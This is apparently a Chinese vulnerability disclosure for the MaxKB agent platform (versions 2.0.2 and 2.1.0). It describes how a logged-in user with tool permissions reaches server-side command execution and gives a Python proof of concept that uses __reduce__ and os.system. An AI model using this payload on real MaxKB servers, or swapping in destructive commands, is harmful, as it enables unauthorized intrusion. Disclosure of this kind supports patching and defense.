项目地址

1Panel-dev/MaxKB: 🔥 MaxKB is an open-source platform for building enterprise-grade agents. MaxKB 是强大易用的开源企业级智能体平台。

影响版本

2.0.2，2.1.0

漏洞过程

该漏洞需要攻击者登录MaxKB后台，并且拥有相关功能权限

登录MaxKB之后，创建工具

输入恶意代码，点击调试

def test():
    class Test2(object):
        def __reduce__(self):
            cmd = 'id > /tmp/asdasdasd'
            return (os.system, (cmd,))
    return Test2()

恶意代码执行，执行结果输出到MaxKB服务器上